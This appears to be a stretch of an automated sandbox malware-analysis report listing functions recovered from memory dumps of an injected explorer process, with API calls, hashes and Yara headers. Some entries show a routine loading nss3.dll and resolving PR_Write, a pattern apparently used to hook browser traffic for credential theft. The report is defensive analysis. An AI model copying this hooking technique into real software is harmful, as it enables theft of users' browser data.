                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5211676204689C6D630DF26E4403AEB7B4F3C9BA4F454666DF9A07B94CB39D886CF01
                                                                                                                                                                                                                                                    Function 10D79D90 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 10D681F0: HeapCreate.KERNEL32 ref: 10D6820D
                                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL ref: 10D79DA4
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32 ref: 10D79DB1
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 10D79DC1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressCreateCriticalHeapInitializeLibraryLoadProcSection
                                                                                                                                                                                                                                                    • String ID: PR_GetDescType$PR_Write$nss3.dll$nss3.dll
                                                                                                                                                                                                                                                    • API String ID: 1509983836-3109363871
                                                                                                                                                                                                                                                    • Opcode ID: 792d0da9db215ca9dc50daf0a5febfa7a65e274b6fe3682fe7e14ce0789f898c
                                                                                                                                                                                                                                                    • Instruction ID: 82de988f8151c515bc0da2d788313934f545c21351ee770d62bacee7d4fd2aff
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 792d0da9db215ca9dc50daf0a5febfa7a65e274b6fe3682fe7e14ce0789f898c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0B279701B07D2EA04EBA1FC963D423A1F75578DF804216D58A43264FFBC828BC380
                                                                                                                                                                                                                                                    Function 0F4B9D90 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A81F0: HeapCreate.KERNEL32 ref: 0F4A820D
                                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL ref: 0F4B9DA4
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32 ref: 0F4B9DB1
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0F4B9DC1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressCreateCriticalHeapInitializeLibraryLoadProcSection
                                                                                                                                                                                                                                                    • String ID: PR_GetDescType$PR_Write$nss3.dll$nss3.dll
                                                                                                                                                                                                                                                    • API String ID: 1509983836-3109363871
                                                                                                                                                                                                                                                    • Opcode ID: 792d0da9db215ca9dc50daf0a5febfa7a65e274b6fe3682fe7e14ce0789f898c
                                                                                                                                                                                                                                                    • Instruction ID: 5399a6d27dc00247cbabf38e2e2972184fcc463b118cff895539351c77f986cd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 792d0da9db215ca9dc50daf0a5febfa7a65e274b6fe3682fe7e14ce0789f898c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12F0BD24A01A0791EB249B56EC913B63365F754755F80113BCD0943661FF3CC55AE350
                                                                                                                                                                                                                                                    Function 0E909D90 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F81F0: HeapCreate.KERNEL32 ref: 0E8F820D
                                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL ref: 0E909DA4
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32 ref: 0E909DB1
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0E909DC1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressCreateCriticalHeapInitializeLibraryLoadProcSection
                                                                                                                                                                                                                                                    • String ID: PR_GetDescType$PR_Write$nss3.dll$nss3.dll
                                                                                                                                                                                                                                                    • API String ID: 1509983836-3109363871
                                                                                                                                                                                                                                                    • Opcode ID: 792d0da9db215ca9dc50daf0a5febfa7a65e274b6fe3682fe7e14ce0789f898c
                                                                                                                                                                                                                                                    • Instruction ID: 4eb973202ec8c447cc1c8300c8665e2ed0693e60cd4b33beef02a352da0e8d7a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 792d0da9db215ca9dc50daf0a5febfa7a65e274b6fe3682fe7e14ce0789f898c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5F0FE24601ACBE2EF04ABA6EC913D523A4F785789F800D16C60EA3175FF7CC65AC740
                                                                                                                                                                                                                                                    Function 10D7C0C8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 10D7C0E5
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 10D7C0DA
                                                                                                                                                                                                                                                      • Part of subcall function 10D7E0B0: _getptd_noexit.LIBCMT ref: 10D7E0B4
                                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10D7C12D
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 10D7C13C
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 10D7C147
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                                                                    • Opcode ID: 317c3e56c46a7f4fd8cb833701ad4ed21f2fa527751d9329f1579f913ecc18a3
                                                                                                                                                                                                                                                    • Instruction ID: 5aa8802db7b292623f075deb4666b14f8fa21000896c856f2a598bfb3780159a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 317c3e56c46a7f4fd8cb833701ad4ed21f2fa527751d9329f1579f913ecc18a3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 822107767083C9CBDB104B61D89131966A0FB447ECFA5D239FEA947BD9CA6CC9818B10
                                                                                                                                                                                                                                                    Function 0F4BC0C8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0F4BC0E5
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0F4BC0DA
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BE0B0: _getptd_noexit.LIBCMT ref: 0F4BE0B4
                                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0F4BC12D
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0F4BC13C
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0F4BC147
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                                                                    • Opcode ID: 317c3e56c46a7f4fd8cb833701ad4ed21f2fa527751d9329f1579f913ecc18a3
                                                                                                                                                                                                                                                    • Instruction ID: 52925dee306f494d69761f30ee95a92d3d4c26689f31fa0f21af0b0aaf4b0040
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 317c3e56c46a7f4fd8cb833701ad4ed21f2fa527751d9329f1579f913ecc18a3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC21F56270438182DF24576298D03EA7361A7847E0F94422FEFA91BB9BCF6CC5428F20
                                                                                                                                                                                                                                                    Function 0C36B4C8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0C36B4E5
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0C36B4DA
                                                                                                                                                                                                                                                      • Part of subcall function 0C36D4B0: _getptd_noexit.LIBCMT ref: 0C36D4B4
                                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0C36B52D
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0C36B53C
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0C36B547
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                                                                    • Opcode ID: ed5f86fbb3efcc5c2f67d0169184bf0ebc0c4f78855528a40e98eae234566d17
                                                                                                                                                                                                                                                    • Instruction ID: 588501ddc5d62c08a57cbbdbfc7a41d31c944fe39efad9dd67bf7eee1f184c13
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed5f86fbb3efcc5c2f67d0169184bf0ebc0c4f78855528a40e98eae234566d17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8521F5627343D483DF21572695843B9E660F7487E8F14C221AB5987F8CDA6CC5459F01
                                                                                                                                                                                                                                                    Function 0E90C0C8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0E90C0E5
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0E90C0DA
                                                                                                                                                                                                                                                      • Part of subcall function 0E90E0B0: _getptd_noexit.LIBCMT ref: 0E90E0B4
                                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E90C12D
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0E90C13C
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0E90C147
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                                                                    • Opcode ID: 317c3e56c46a7f4fd8cb833701ad4ed21f2fa527751d9329f1579f913ecc18a3
                                                                                                                                                                                                                                                    • Instruction ID: 9ec330f6fd51687275d6a37859a328300365dde6cf695d7420e46a719fa4d6fc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 317c3e56c46a7f4fd8cb833701ad4ed21f2fa527751d9329f1579f913ecc18a3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B92107A27053C18ADF645721D49032AE2A0A7C57E0FD44B21EAA907BD8CA6CCE858F00
                                                                                                                                                                                                                                                    Function 0A03B4C8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0A03B4E5
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0A03B4DA
                                                                                                                                                                                                                                                      • Part of subcall function 0A03D4B0: _getptd_noexit.LIBCMT ref: 0A03D4B4
                                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0A03B52D
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0A03B53C
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0A03B547
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                                                                    • Opcode ID: ed5f86fbb3efcc5c2f67d0169184bf0ebc0c4f78855528a40e98eae234566d17
                                                                                                                                                                                                                                                    • Instruction ID: 71636cb8e69751fd409cc17c33056a6da96ecd3d3b9a81d447575b0bc91aaeeb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed5f86fbb3efcc5c2f67d0169184bf0ebc0c4f78855528a40e98eae234566d17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51212663F193CC92DF605B26958036D72E8E7877E8F144221EAAA07B89CF6CC5418F00
                                                                                                                                                                                                                                                    Function 0E8BB4C8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0E8BB4E5
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0E8BB4DA
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BD4B0: _getptd_noexit.LIBCMT ref: 0E8BD4B4
                                                                                                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E8BB52D
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0E8BB53C
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0E8BB547
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                                                                    • Opcode ID: ed5f86fbb3efcc5c2f67d0169184bf0ebc0c4f78855528a40e98eae234566d17
                                                                                                                                                                                                                                                    • Instruction ID: 3b34da7d8a94a8237991f0a89417250c505443c523c55beefc06121e0049a790
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed5f86fbb3efcc5c2f67d0169184bf0ebc0c4f78855528a40e98eae234566d17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 542129627047C483DF205BAA95D03EB66A0F7447E4F544621EAA9CBBD8CE6CCD41CB02
                                                                                                                                                                                                                                                    Function 10D81B60 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _malloc_crt.LIBCMT ref: 10D81B89
                                                                                                                                                                                                                                                      • Part of subcall function 10D7EDE8: malloc.LIBCMT ref: 10D7EE13
                                                                                                                                                                                                                                                      • Part of subcall function 10D7EDE8: Sleep.KERNEL32 ref: 10D7EE26
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 10D81C8A
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 10D81CA6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2523592665-0
                                                                                                                                                                                                                                                    • Opcode ID: b436127c92ce9e12bf56c38ba04fa08727bf580a0882eefa332f416636256f05
                                                                                                                                                                                                                                                    • Instruction ID: 29ce74b06294b80f9cad08a78b7f8cdbd63860dc08ace2c5cec184d02ccd3108
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b436127c92ce9e12bf56c38ba04fa08727bf580a0882eefa332f416636256f05
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1051C33A300B4193DB10DF66F99135A73A8F788B98F494126EF8C07B50EF38D4AA8744
                                                                                                                                                                                                                                                    Function 0F4C1B60 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _malloc_crt.LIBCMT ref: 0F4C1B89
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BEDE8: malloc.LIBCMT ref: 0F4BEE13
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BEDE8: Sleep.KERNEL32 ref: 0F4BEE26
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0F4C1C8A
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0F4C1CA6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2523592665-0
                                                                                                                                                                                                                                                    • Opcode ID: b436127c92ce9e12bf56c38ba04fa08727bf580a0882eefa332f416636256f05
                                                                                                                                                                                                                                                    • Instruction ID: b7810b9033df19bbc188fc15a59518021f3e5a7f172f47bea42a474f6fd92af5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b436127c92ce9e12bf56c38ba04fa08727bf580a0882eefa332f416636256f05
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC51A13A300B0193EB65DF66E99036A7364FB88B98F54512E9F4D07B12EF3CD0668784
                                                                                                                                                                                                                                                    Function 0E911B60 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _malloc_crt.LIBCMT ref: 0E911B89
                                                                                                                                                                                                                                                      • Part of subcall function 0E90EDE8: malloc.LIBCMT ref: 0E90EE13
                                                                                                                                                                                                                                                      • Part of subcall function 0E90EDE8: Sleep.KERNEL32 ref: 0E90EE26
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0E911C8A
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0E911CA6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2523592665-0
                                                                                                                                                                                                                                                    • Opcode ID: b436127c92ce9e12bf56c38ba04fa08727bf580a0882eefa332f416636256f05
                                                                                                                                                                                                                                                    • Instruction ID: 29e95814b6bf6df773563572fabe729346265e4e7b76a87e1a15f9b0eb2384d8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b436127c92ce9e12bf56c38ba04fa08727bf580a0882eefa332f416636256f05
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC517F36302B44A3DB14DF57E99072973A4F7C8BA8F444A259F5D07B14EF38C8668B44
                                                                                                                                                                                                                                                    Function 10D8A8F0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 10D8A91B
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 10D8A910
                                                                                                                                                                                                                                                      • Part of subcall function 10D7E0B0: _getptd_noexit.LIBCMT ref: 10D7E0B4
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 10D8A9BE
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 10D8A9C9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1573762532-0
                                                                                                                                                                                                                                                    • Opcode ID: 74055d6ee9e4fb02c2aae79da2499295d3fdc22e52b857c73163c0c12161e12c
                                                                                                                                                                                                                                                    • Instruction ID: 38089077a2eefa384b952a9e0b1ce3540a0a1bf1f3daee274dc880f8d5b63365
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74055d6ee9e4fb02c2aae79da2499295d3fdc22e52b857c73163c0c12161e12c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A415676A1439683EF58AF2A92402B97360F744BD4FCA4117EFD857A84E73CC941CB12
                                                                                                                                                                                                                                                    Function 0F4CA8F0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0F4CA91B
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0F4CA910
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BE0B0: _getptd_noexit.LIBCMT ref: 0F4BE0B4
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0F4CA9BE
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0F4CA9C9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1573762532-0
                                                                                                                                                                                                                                                    • Opcode ID: 74055d6ee9e4fb02c2aae79da2499295d3fdc22e52b857c73163c0c12161e12c
                                                                                                                                                                                                                                                    • Instruction ID: 57938cf7aaa0654a8c5d93e7f48143c9acce89bdfdfb86c2ab4f7971ca8efb1f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74055d6ee9e4fb02c2aae79da2499295d3fdc22e52b857c73163c0c12161e12c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5641547AA0039982CFA49B2292612FB7360F740B94FC9621FDF8497786D73DE142C780
                                                                                                                                                                                                                                                    Function 0C379CF0 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0C379D1B
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0C379D10
                                                                                                                                                                                                                                                      • Part of subcall function 0C36D4B0: _getptd_noexit.LIBCMT ref: 0C36D4B4
                                                                                                                                                                                                                                                    • _errno.LIBCMT ref: 0C379DBE
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 0C379DC9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1573762532-0
                                                                                                                                                                                                                                                    • Opcode ID: b55742b4234d73174801681c6d4f3e38c375047db813c1bae61b358c49144199
                                                                                                                                                                                                                                                    • Instruction ID: 5e9efcba0532038252c82bea2e36d6971001d2a1a2d264889e515e058efab19c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b55742b4234d73174801681c6d4f3e38c375047db813c1bae61b358c49144199
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B041F172B3139582DF34AB2296403BD73A4F744B96FA88316DB9557A88D73CC151CF00
